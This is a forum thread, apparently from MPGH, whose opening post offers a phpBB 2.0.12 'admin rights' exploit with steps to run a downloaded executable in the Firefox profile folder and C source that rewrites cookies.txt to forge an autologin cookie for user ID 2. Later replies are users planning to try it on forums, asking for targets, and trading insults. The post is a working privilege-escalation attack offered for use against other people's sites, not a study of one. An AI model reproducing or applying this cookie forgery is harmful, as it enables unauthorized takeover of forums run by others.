Results 1 to 15 of 15
  1. #1
    eXe's Avatar
    Join Date
    Jan 2006
    Posts
    6
    Reputation
    10
    Thanks
    4

    phpBB <==2.0.12 - [Admin Rights]!

    /*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^ *^*^*^*\
    This is an exploit for phpBB 2.0.12 and under.
    Its very simple to use but some forums have been patched.

    First download the 897.rar file:
    Place 879.exe in your firefox folder.
    Usually:
    C:\DocumentsandSettings\ApplicationData\Mozilla\Fi refox\Profiles\something.default
    Visit a site that is using phpBB 2.0.12 or under, close the browser!
    Double click the .exe file.
    Than, browse the Forums again.
    This gives anonymous users administrator rights only.
    If something goes wrong clear cookies and try again.

    Source Code:

    Code:
    //Released on MPGH.net
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    //Taken from VeNoMouS's love cow code
    char *search_and_replace (char *text, char *find, char *replace)
    {
    char *found,*new_text;
    int
    len_find=strlen(find),len_replace=strlen(replace),len_text=strlen(text),i=0,j=0;
    
    if((new_text=(char*)malloc(len_text+len_replace-len_find+1))==NULL)
           {
           printf("malloc issue...\n");
           return new_text;
           }
    found = strstr(text, find);
    while (i <= len_text)
    {
    if ( found != text + i )
           {
           new_text[j] = text[i];
           i++;
           j++;
           }
           else
           {
               strcat (new_text, replace);
               i += len_find;
               j += len_replace;
               found = strstr (text + i, find);
           }
           new_text[j] = '\0';
    }
    return new_text;
    }
    
    int main()
    {
      FILE * pFile;
      long lSize;
      char * buffer;
    
      pFile = fopen ( "cookies.txt" , "r" );
      if (pFile==NULL) exit (1);
    
      fseek (pFile , 0 , SEEK_END);
      lSize = ftell (pFile);
      rewind (pFile);
    
      buffer = (char*) malloc (lSize);
      if (buffer == NULL) exit (2);
      fread (buffer,1,lSize,pFile);
      fclose (pFile);
    
      pFile = fopen ( "cookies.txt" , "w" );
      fputs(search_and_replace((char *)buffer,"a%3A0%3A%7B%7D","a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"), pFile);
      fclose (pFile);
      free (buffer);
      return 0;
    
    }
    //Released on MPGH.net
    Brought To You By MPGH.net
    \*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^* ^*^*^*^*/

  2. #2
    arunforce's Avatar
    Join Date
    Dec 2005
    Gender
    male
    Location
    A place for amigos
    Posts
    24,703
    Reputation
    4747
    Thanks
    12,562
    My Mood
    Yeehaw
    Nice, gonna give this a try!



    BRING BACK BT, BRING BACK SAGA, BRING BACK VF, BRING BACK MPGHCRAFT, BRING BACK HABAMON


  3. #3
    Skurdz's Avatar
    Join Date
    Jan 2006
    Gender
    male
    Posts
    162
    Reputation
    10
    Thanks
    22
    My Mood
    Bored
    lol didnt you do that already with dave or sumthin? donno or that was pure hackage!



  4. #4
    i eat trees's Avatar
    Join Date
    Dec 2005
    Gender
    male
    Location
    RACISM
    Posts
    1,420
    Reputation
    54
    Thanks
    187
    ...firefox? sigh

    my sig is smaller then half the sigs on mpgh

  5. #5
    Lil Chris's Avatar
    Join Date
    Feb 2006
    Posts
    3
    Reputation
    10
    Thanks
    0
    i really hate this eXe guy this exploit is fucking old i think phpBB is in like phpBB 2.0.19 now so you are years late my friend =\

  6. #6
    Dave84311's Avatar
    Join Date
    Dec 2005
    Gender
    male
    Location
    The Wild Wild West
    Posts
    35,837
    Reputation
    5782
    Thanks
    41,292
    My Mood
    Devilish
    Few months at least...





    THE EYE OF AN ADMINISTRATOR IS UPON YOU. ANY WRONG YOU DO IM GONNA SEE, WHEN YOU'RE ON MPGH, LOOK BEHIND YOU, 'CAUSE THATS WHERE IM GONNA BE


    "First they ignore you. Then they laugh at you. Then they fight you. Then you lose.” - Dave84311

    HAVING VIRTUAL DETOX

  7. #7
    i eat trees's Avatar
    Join Date
    Dec 2005
    Gender
    male
    Location
    RACISM
    Posts
    1,420
    Reputation
    54
    Thanks
    187
    It would have worked on the forum i wanted to hack but guests arnt aloud to post :/

    my sig is smaller then half the sigs on mpgh

  8. #8
    Flawless's Avatar
    Join Date
    Dec 2005
    Gender
    male
    Location
    Brink Of Sanity
    Posts
    625
    Reputation
    129
    Thanks
    478
    Quote Originally Posted by Lil Chris
    i really hate this eXe guy this exploit is fucking old i think phpBB is in like phpBB 2.0.19 now so you are years late my friend =\
    Stop flaming on people, this one of the few things I hate seeing on these forums. You've been warned.

  9. #9
    AthlaS's Avatar
    Join Date
    Jan 2006
    Posts
    100
    Reputation
    10
    Thanks
    18
    Can anyone give me an example of a forum this will work with? I already tried MPGH.

  10. #10
    castaway's Avatar
    Join Date
    Mar 2007
    Location
    In a BIG Box.
    Posts
    1,636
    Reputation
    14
    Thanks
    97
    Quote Originally Posted by AthlaS View Post
    Can anyone give me an example of a forum this will work with? I already tried MPGH.
    You are really a Dumb Fuck if you say that on the forum.

  11. #11
    Alen's Avatar
    Join Date
    Oct 2007
    Gender
    male
    Location
    Liquid Generator
    Posts
    27,920
    Reputation
    2548
    Thanks
    4,224
    My Mood
    Fine
    Quote Originally Posted by thimo View Post
    You are really a Dumb Fuck if you say that on the forum.
    Thats nearly 2 years old thimo ... you ok?

  12. #12
    radnomguywfq3's Avatar
    Join Date
    Jan 2007
    Gender
    male
    Location
    J:\E\T\A\M\A\Y.exe
    Posts
    8,858
    Reputation
    381
    Thanks
    1,823
    My Mood
    Sad
    PhpBB 3 is already out, I don't doubt people will be upgrading, although. 3.0 doesn't have Cats =X



    There are two types of tragedies in life. One is not getting what you want, the other is getting it.

    If you wake up at a different time in a different place, could you wake up as a different person?


  13. #13
    rambone11's Avatar
    Join Date
    Feb 2008
    Posts
    98
    Reputation
    10
    Thanks
    4
    gonna try xD thx :P

  14. #14
    melropower's Avatar
    Join Date
    Aug 2008
    Posts
    1
    Reputation
    10
    Thanks
    0
    sometinhing newer???

  15. #15
    GG2GG's Avatar
    Join Date
    Mar 2008
    Gender
    male
    Location
    United Kingdom
    Posts
    3,382
    Reputation
    21
    Thanks
    4,294,967,295
    My Mood
    Blah
    dont bring old shit up and fuck off mpgh after fool

Similar Threads

  1. [Solved] Admin Rights
    By Hitmaniac in forum MapleStory Help
    Replies: 19
    Last Post: 08-11-2011, 09:28 PM
  2. Admin, howto limit rights?
    By Gabbe in forum Call of Duty Modern Warfare 2 Help
    Replies: 2
    Last Post: 08-30-2010, 02:47 AM
  3. Admins
    By scuartas in forum General
    Replies: 31
    Last Post: 07-11-2010, 07:15 AM
  4. Phpbb forum hacks
    By i eat trees in forum Hack Requests
    Replies: 0
    Last Post: 01-15-2006, 04:33 PM
  5. Joining [MPGH] Clan, Buying Admin etc.
    By Dmx in forum CounterStrike (CS) 1.6 Hacks / Counter Strike: Source (CSS) Hacks
    Replies: 11
    Last Post: 01-03-2006, 11:52 AM